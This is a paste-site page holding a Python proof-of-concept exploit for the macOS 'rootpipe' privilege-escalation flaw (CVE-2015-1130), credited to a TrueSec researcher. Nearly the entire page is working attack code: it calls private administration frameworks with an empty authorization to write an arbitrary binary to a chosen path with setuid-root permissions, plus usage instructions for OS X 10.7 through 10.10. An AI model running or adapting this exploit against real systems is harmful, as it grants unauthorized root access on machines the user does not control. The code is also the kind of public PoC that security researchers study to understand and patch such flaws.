OSXroot

From Fiery Macaw, 7 Years ago, written in Plain Text, viewed 609 times.
URL https://code.nat.moe/view/e3b9dff9 Embed
Download Paste or View Raw
  1. ########################################################
  2. #
  3. #  PoC exploit code for rootpipe (CVE-2015-1130)
  4. #
  5. #  Created by Emil Kvarnhammar, TrueSec
  6. #
  7. #  Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2
  8. #
  9. ########################################################
  10. import os
  11. import sys
  12. import platform
  13. import re
  14. import ctypes
  15. import objc
  16. import sys
  17. from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions
  18. from Foundation import NSAutoreleasePool
  19.  
  20. def load_lib(append_path):
  21.     return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path);
  22.  
  23. def use_old_api():
  24.     return re.match("^(10.7|10.8)(.\d)?$", platform.mac_ver()[0])
  25.  
  26.  
  27. args = sys.argv
  28.  
  29. if len(args) != 3:
  30.     print "usage: exploit.py source_binary dest_binary_as_root"
  31.     sys.exit(-1)
  32.  
  33. source_binary = args[1]
  34. dest_binary = os.path.realpath(args[2])
  35.  
  36. if not os.path.exists(source_binary):
  37.     raise Exception("file does not exist!")
  38.  
  39. pool = NSAutoreleasePool.alloc().init()
  40.  
  41. attr = NSMutableDictionary.alloc().init()
  42. attr.setValue_forKey_(04777, NSFilePosixPermissions)
  43. data = NSData.alloc().initWithContentsOfFile_(source_binary)
  44.  
  45. print "will write file", dest_binary
  46.  
  47. if use_old_api():
  48.     adm_lib = load_lib("/Admin.framework/Admin")
  49.     Authenticator = objc.lookUpClass("Authenticator")
  50.     ToolLiaison = objc.lookUpClass("ToolLiaison")
  51.     SFAuthorization = objc.lookUpClass("SFAuthorization")
  52.  
  53.     authent = Authenticator.sharedAuthenticator()
  54.     authref = SFAuthorization.authorization()
  55.  
  56.     # authref with value nil is not accepted on OS X <= 10.8
  57.     authent.authenticateUsingAuthorizationSync_(authref)
  58.     st = ToolLiaison.sharedToolLiaison()
  59.     tool = st.tool()
  60.     tool.createFileWithContents_path_attributes_(data, dest_binary, attr)
  61. else:
  62.     adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration")
  63.     WriteConfigClient = objc.lookUpClass("WriteConfigClient")
  64.     client = WriteConfigClient.sharedClient()
  65.     client.authenticateUsingAuthorizationSync_(None)
  66.     tool = client.remoteProxy()
  67.  
  68.     tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)
  69.  
  70.  
  71. print "Done!"
  72.  
  73. del pool

Reply to "OSXroot"

Here you can reply to the paste above

captcha